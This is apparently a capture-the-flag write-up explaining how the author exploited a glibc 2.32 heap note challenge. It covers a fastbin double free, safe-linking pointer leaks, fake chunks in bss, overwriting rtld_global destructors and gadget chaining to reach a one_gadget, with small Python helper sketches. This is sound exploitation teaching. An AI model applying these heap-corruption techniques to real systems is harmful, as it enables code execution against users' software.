When I wrote this challenge, glibc 2.32 was the latest and greatest, so I made sure I could exploit this on 2.27, 2.29, 2.31 and 2.32. I only expect you to do the 2.32 version ;)
nile was kind of your regular heap note challenge, where you can add, view and free chunks. But it had some twists, which made it quite hard to exploit.
Adding a fake endorsement allocates a 0x30 chunk, and adding a description allocates a 0x50 chunk. All chunks are allocated via calloc, which does not serve chunks from tcache, so the easy path via tcache poisoning is not feasible :(
Also, since the challenge is using libc-2.32, we have to keep in mind that we cannot directly use double frees, since tcache will check for that. But we can get around this by first freeing 7 chunks regularly to fill the tcache bin. After that, further frees of the same size go into the fastbins in main_arena, where a double free works again (as long as the same chunk isn’t freed twice in a row).
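To make the free order a bit more tangible, here is a toy model of a single size class. This is not glibc code, the class and function names are made up for illustration, and the checks are heavily simplified: tcache rejects a chunk it already holds, while the fastbin only compares against the chunk currently on top of the list.

```python
TCACHE_MAX = 7  # entries one tcache bin holds by default


class ToyBins:
    """Toy model of one size class; chunks are just string labels."""

    def __init__(self):
        self.tcache = []
        self.fastbin = []

    def free(self, chunk):
        # While tcache has room, frees land there and duplicates are caught.
        if len(self.tcache) < TCACHE_MAX:
            if chunk in self.tcache:
                raise RuntimeError("double free detected in tcache")
            self.tcache.append(chunk)
            return "tcache"
        # Full tcache: the fastbin only checks the most recently freed chunk.
        if self.fastbin and self.fastbin[-1] == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        self.fastbin.append(chunk)
        return "fastbin"


def double_free_sequence():
    """Fill tcache with 7 fillers, then free A, B, A into the fastbin."""
    bins = ToyBins()
    for i in range(TCACHE_MAX):
        bins.free(f"filler{i}")
    for chunk in ("A", "B", "A"):
        bins.free(chunk)
    return bins.fastbin
```

In this model `double_free_sequence()` ends with chunk A in the fastbin twice, which is the state the rest of the exploit builds on.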
With this, we can start leaking heap values (again, libc-2.32 is used, so heap addresses will be mangled).
One thing to note for this… When developing the exploit locally with ASLR disabled, the leak will look wrong.
This happens, because the mangled heap address will contain null bytes.
Though with ASLR enabled, it will not contain any null bytes most of the time and can just be read this way.
But while developing the exploit, we don’t want to activate ASLR. Since we know that the leak will work correctly remotely, we can just add a small fix to let our exploit also work locally with ASLR deactivated.
So, when we’re running locally and ASLR is disabled, we just set the value to what it “should” be, and from here on we can debug it with and without ASLR the same way.
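A small sketch of why the local leak looks wrong and how such a fallback could look. The helper names and the example addresses are assumptions for illustration, not taken from the original exploit; the only real ingredient is the safe-linking formula `(pos >> 12) ^ ptr`.

```python
import struct


def protect_ptr(pos, ptr):
    """Safe-linking as used by glibc 2.32: mangle ptr stored at address pos."""
    return (pos >> 12) ^ ptr


def leak_as_cstring(value):
    """Simulate printing a 64 bit value as a C string (stops at first null)."""
    raw = struct.pack("<Q", value)
    return raw.split(b"\x00", 1)[0]


def parse_leak(raw, aslr_enabled, expected_local=None):
    """Return the leaked value, or the known local value without ASLR."""
    if not aslr_enabled and expected_local is not None:
        # Hypothetical fallback: the local leak is truncated, so use the
        # value we already know from the debugger.
        return expected_local
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


# Example heap addresses (assumed): typical no-ASLR heap vs. a randomized one.
NO_ASLR = protect_ptr(0x55555555B2A0, 0x55555555B2A0)
WITH_ASLR = protect_ptr(0x5581D3C4B2A0, 0x5581D3C4B2A0)
```

With the no-ASLR heap base, the XOR cancels out the repeated `0x55` bytes, so the mangled value contains null bytes in the middle and the printed leak is cut short.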
This will give us a mangled heap pointer, which can luckily be reversed to get to the real heap address.
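Reversing the mangling can be sketched as below. The function name is made up, and the sketch assumes the stored pointer and the location it is stored at lie on the same 4 KiB page (so `pos >> 12 == ptr >> 12`), which is usually the case for neighbouring small heap chunks but is still an assumption.

```python
def reveal_ptr_same_page(mangled):
    """Undo ptr ^ (ptr >> 12) for a 64 bit value.

    The top 12 bits of the mangled value are already correct, and every
    round recovers 12 more bits, so a handful of rounds is enough.
    """
    ptr = mangled
    for _ in range(6):
        ptr = mangled ^ (ptr >> 12)
    return ptr


def protect_ptr(pos, ptr):
    """Forward direction, only used here to check the round trip."""
    return (pos >> 12) ^ ptr
```

For a leaked value `m`, `reveal_ptr_same_page(m)` then gives back the heap pointer, from which the heap base follows by subtracting the known chunk offset.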
This wasn’t too hard, but from here the real pain began (also not having a debug version of libc/ld at hand didn’t make it any better).
We have a double free, but since it’s handled via calloc, the chunks have to be 16 byte aligned and they need to have a correct size (0x50 or 0x30), so we cannot just allocate anywhere…
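The two constraints can be written down as a quick check to run against candidate addresses. This is a simplified sketch of the fastbin checks as I understand them for glibc 2.32 (alignment of the user pointer, and the size field mapping to the bin being served); the helper names are made up.

```python
MALLOC_ALIGN_MASK = 0xF  # 16 byte alignment on x86_64


def fastbin_index(size):
    """Bin index for a chunk size on 64 bit; the low flag bits drop out."""
    return (size >> 4) - 2


def fake_chunk_ok(chunk_addr, size_field, wanted_size):
    """Would a fake chunk at chunk_addr pass when serving wanted_size?"""
    user_ptr = chunk_addr + 0x10  # user data starts after prev_size and size
    aligned = (user_ptr & MALLOC_ALIGN_MASK) == 0
    same_bin = fastbin_index(size_field) == fastbin_index(wanted_size)
    return aligned and same_bin
```

For example, `fake_chunk_ok(0x5555555580c0, 0x50, 0x50)` passes, while the same size at `0x5555555580c8` fails the alignment check.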
But let’s start with the obvious things first. We need a libc leak.
For this, it would be useful to free a chunk, that will not be handled as a fastbin, but we can only create 0x30 and 0x50 chunks… Except, when doing an upgrade: This will allocate a 0xc00 chunk on the heap, in which the chunks of the professional plan will be stored.
If we could free this chunk, we would get some main_arena pointers onto the heap, which we might be able to leak afterwards, so let’s start with that.
While preparing the previous heap leak, I also triggered the upgrade functionality. This was done on purpose: after the leak, we still have a double freed pointer in main_arena and have also already allocated the 0xc00 chunk for the professional plan on the heap.
We’ll use the next allocation to overwrite the FD pointer of the first chunk with a pointer pointing to the pro_plan chunk.
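Since glibc 2.32 also mangles fastbin FD pointers, the value written into the chunk has to be mangled with the address it is stored at. A minimal sketch, with a made-up helper name and example addresses that are assumptions:

```python
def mangle_fd(fd_field_addr, target_chunk):
    """Value to write as FD so the bin later yields target_chunk.

    fd_field_addr: address of the FD field being overwritten.
    target_chunk:  address of the fake chunk header, which has to be
                   16 byte aligned to pass the alignment check.
    """
    if target_chunk & 0xF:
        raise ValueError("target chunk must be 16 byte aligned")
    return (fd_field_addr >> 12) ^ target_chunk
```

The heap leak from before is what makes `fd_field_addr` known in the first place.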
After that we’ll allocate the next chunk (which is directly above the pro plan chunk) and now put a valid chunk size above the pro_plan chunk.
The next allocation will then get our fake chunk on top of the pro plan, and since we put a valid chunk size there, it should succeed.
The next 0x50 allocation will thus serve our fake chunk, with which we can overwrite the first bytes from the pro_plan chunk.
This will put a pointer to the pro_plan itself into the first pro chunk slot, which we could now free to get a free bin on the heap, but this will trigger malloc_consolidate, which will notice, that our chunks are totally messed up and abort.
But luckily, we can get around this, by creating a dummy endorsement, which will fix this for us.
Ok, so finally some libc pointers on the heap, now we’ll just need to get them “reviewable”. We have to keep in mind that any allocation will now be served from the freed bin, thus overwriting the pro plan entries themselves and also moving the libc addresses down the heap.
Allocating four 0x30 chunks from the unsorted bin, with pointers to where the main_arena pointers will be after those allocations, will result in a valid pro_plan.
Though every second slot has an invalid buffer, this is not an issue anymore, since the IsFree part of it contains 0x31, so it will be skipped in review (as it will interpret those as freed notes) and we can just leak the other slots with valid pointers.
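How the 0x30 chunks line up with the 0x18 byte pro plan slots can be sketched like this. The field order (buffer, size, is_free) and the review behaviour are my assumptions based on the description above, and all names are hypothetical.

```python
import struct

SLOT = struct.Struct("<QQQ")  # assumed slot layout: buffer, size, is_free


def chunk_0x30(buf_ptr, size):
    """0x20 bytes of user data followed by the next chunk's header."""
    user_data = struct.pack("<QQQQ", buf_ptr, size, 0, 0)
    next_header = struct.pack("<QQ", 0, 0x31)  # prev_size, size | PREV_INUSE
    return user_data + next_header


def reviewable_slots(table):
    """Indices and buffers of slots a review loop would not skip."""
    result = []
    for off in range(0, len(table) - SLOT.size + 1, SLOT.size):
        buf, size, is_free = SLOT.unpack_from(table, off)
        if is_free == 0:  # non-zero is treated as "freed" and skipped
            result.append((off // SLOT.size, buf))
    return result
```

Each 0x30 chunk covers exactly two slots: the first takes its fields from our data, the second ends up with the next chunk's 0x31 size in its is_free field.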
Now, how to get rip control from here on?
First, I checked, if there were any valid chunk sizes (16 byte-aligned) in libc or ld, which could help us to overwrite something useful (I was already thinking in the direction of rtld_global there, since with aligned chunks, I didn’t see any feasible way to overwrite malloc_hook or free_hook).
But no chance, didn’t find any region, which contained a value, with which we could allocate a 0x50 or 0x30 chunk.
So, after a lot of failed tries, I checked bss to see, if we could somehow do something there.
Also no good chunk sizes there, for example to attack the GOT… But can we create a fake chunk anywhere in bss?
Well, we kind of control the current pro count by adding more chunks, so we could create a valid chunk size there, and allocate a chunk overlapping the pointer to the pro_plan itself.
This will not allow us to “directly” write data anywhere, but we could let it point to a table structure (like dtors). Creating chunks then in the pro plan, could potentially overwrite a table entry with a heap chunk, from which _dl_fini would then fetch the function to execute, which could lead to rip control.
But this would also mean that we need to be able to do a clean exit, since the challenge will call cleanup before exiting, which will try to free all currently allocated chunks (which will most likely fail, after the whole mess we created by now on the heap).
We’ll also need to find a way around that, but let’s keep that for later.
First, we’ll need a leak of an address in the ELF region:
This will create another entry in our freed pro plan, with its buffer pointing to a libc address, that contains a pointer to our elf.
But at the current state, the heap is such a mess, that almost every allocation will go haywire. Thus we also need to put a valid chunksize in our payload to fix the followup fastbin. Otherwise malloc will notice the invalid fastbin and crash.
Allocations and frees really start to become a pain from here on…
With this, we were successful on leaking an address pointing to bss, so we can now prepare putting a fake chunk there.
But trying to use the double free to allocate a chunk onto bss now triggered malloc_consolidate again, and it checked the unsorted bin on the heap, which… well… wasn’t linked correctly anymore, since we were overwriting it with pro plan chunks.
So, let’s first take a detour to repair this…
We use the double free again to allocate a fake chunk overlapping the bin, and then with the last allocation overwrite the size of the bin with 0x20 and put valid main_arena pointers into it. By resizing it, we won’t have to bother with it anymore, since we’ll never do an allocation that could fit into a 0x20 bin, so hopefully, we’re good now.
Now, we can go on with allocating into bss, by first increasing the pro plan counter, so that when our final allocation happens, we’ll have a 0x50 size in it.
Looking good. The next allocation will increase the pro plan counter to 0x50 and then allocate the next chunk at 0x00005555555580c0, which will succeed, since we have a valid chunk size there now.
So, with the next chunk, we’ll be able to overwrite the pro_plan pointer itself. Keep in mind, that we’ll not be able to write arbitrary data there, but we’ll overwrite the target region with pointers to our heap chunks. That’s why I went for rtld_global.
After some experimentation (aka debugging the hell out of _dl_fini), the following region looked good
We have to keep in mind that we have already allocated 0x50 pro chunks, each taking a 0x18 byte slot, so when overwriting the pro_plan pointer, we want to point it to dest_address-(0x50*0x18), so that the next allocations will be written to dest_address.
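The offset calculation is simple, but easy to get wrong in the middle of the night, so here it is spelled out. The helper names are made up and the destination address in the usage note is only a placeholder.

```python
SLOT_SIZE = 0x18  # bytes per pro plan entry, as used in the formula above


def fake_plan_base(dest_address, used_slots):
    """Base to store in the pro_plan pointer so the next slot hits dest."""
    return dest_address - used_slots * SLOT_SIZE


def slot_address(plan_base, index):
    """Where the entry with the given index is written."""
    return plan_base + index * SLOT_SIZE
```

With 0x50 entries already in use, `slot_address(fake_plan_base(dest, 0x50), 0x50)` is `dest` again, and the following entries land at `dest + 0x18`, `dest + 0x30` and so on.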
We’ll first start putting some placeholder chunks there, which will be needed later (this is the result of hours of fiddling around in ld, so it’s a bit hard to explain in the right order, but should become clearer later on)
If we could exit now (getting through cleanup without a crash), this would just exit cleanly, since we haven’t overwritten any dtors yet. This was just to prepare some placeholders, which we’ll need later to be able to cleanly call one_gadget.
With the next allocations, we’ll overwrite a dtor pointer, which will be called later on, but we now also have to think about how we can survive cleanup in order to arrive at _dl_fini at all.
We again trigger a double free, so that we can control, where next allocations will go to. We then overwrite the FD of the doubly freed chunk with a pointer to pro_plan again. Then we’ll allocate a dummy chunk to pull in our fake fd into main_arena.
The last description will now overwrite a dtor pointer in rtld_global with 0xfacebabe, which could lead to code execution, if we make it there.
The next allocation, will again overwrite the pro_plan pointer, since we already placed a FD pointing there in main_arena.
We’ll now let it point directly above itself (subtracting the appropriate offset of already allocated chunks again).
By doing this, the next chunk allocation will write the buffer address to 0x5555555580b8, its size to 0x5555555580c0 and its is_freed value to 0x5555555580c8 (which happens to be the pro_plan counter).
This will effectively set the pro_plan_counter to 0. Exactly what we need to fix cleanup.
Finally, time to exit and trigger our chain (and to fix it up).
Since cleanup is now executed nice and clean, we’ll end up in _dl_fini, running into our fake dtors there.
This will now fetch the value from rax+0x8 and add the value at r15 (0x0000555555554000, which is elf base) to it, and then call it.
We previously put 0xfacebabe there, so this would now call 0x55565023fabe. Not quite right, so let’s go back there and fix that value.
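The arithmetic behind this, and the inverse needed to pick the right value, can be sketched as follows. The function names are made up; the only facts used are that the stored value gets added to the ELF base before the call, as described above.

```python
MASK64 = (1 << 64) - 1


def call_target(elf_base, stored_value):
    """Address _dl_fini ends up calling for a given stored value."""
    return (elf_base + stored_value) & MASK64


def stored_for(elf_base, wanted_target):
    """Value to store so that the call lands on wanted_target."""
    return (wanted_target - elf_base) & MASK64


ELF_BASE = 0x0000555555554000
```

`call_target(ELF_BASE, 0xfacebabe)` gives the wrong address from above, and storing `stored_for(ELF_BASE, target)` instead compensates for the added base.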
Calling 0x7ffffacebabe… Seems, we have rip control, yay…
But wait… None of the one_gadget constraints can be fulfilled, and also none of the registers point anywhere useful to maybe do some stack pivoting =(
This would have been a good candidate, since r12 is already 0x0, but rdx contains an address, thus we cannot use it (for now…).
Well, this took quite some time to come up with a solution for, but after wading through countless gadgets to make anything useful from the situation, I came up with this:
$r15 is pointing to the ld region, we overwrote with our pro plan chunks.
So, yeah, that’s the reason, I put that chunk there previously (hard to explain this whole mess in the right order).
By using the above gadget, we can point rax to our chunk on the heap, and it will then jump to rax+0x8 (which currently is 0xdeadbeef). Not quite there yet, but at least we have one register more containing an address, which is under our control.
Still, we just went from one crash to another…
But, we can now branch into another gadget:
When executing this
This will now move the value from rbx+0x40 (0x0) into rdx and then call rax+0x70. So, this will effectively zero out rdx and we fulfilled the constraints for the one_gadget from above (r12 == 0 & rdx == 0).
Remember, that I put the one_gadget address previously in one of the fake chunks? Surprise, it’s now exactly at rax+0x70…
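As a rough picture of the memory rax points to at this stage: the second gadget sits at offset 0x8 and the one_gadget at offset 0x70. The sketch below just builds such a region as one flat buffer. In the real exploit this data is spread over several heap chunks, and the helper name and both addresses are placeholders, not the real gadget addresses.

```python
import struct


def build_region(size, qwords):
    """Flat buffer of `size` bytes with 64 bit values at given offsets."""
    buf = bytearray(size)
    for offset, value in qwords.items():
        struct.pack_into("<Q", buf, offset, value)
    return bytes(buf)


# Placeholder addresses, purely for illustration.
ZERO_RDX_GADGET = 0x7FFFF7E00000
ONE_GADGET = 0x7FFFF7E10000

REGION = build_region(0x80, {0x8: ZERO_RDX_GADGET, 0x70: ONE_GADGET})
```

The first jump goes through the value at `+0x8`, the gadget there zeroes rdx and then calls through the value at `+0x70`.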
Finally at the end of the journey :)
Phew, this challenge took a lot of time, going down so many rabbit holes, redoing the code execution part again and again. Though, I was cursing a LOT in the middle of the night, I enjoyed the challenge quite a lot in hindsight.
Still, I’m quite curious about other people’s solutions, to see if it can be solved in an easier way, since this one was definitely a real pain.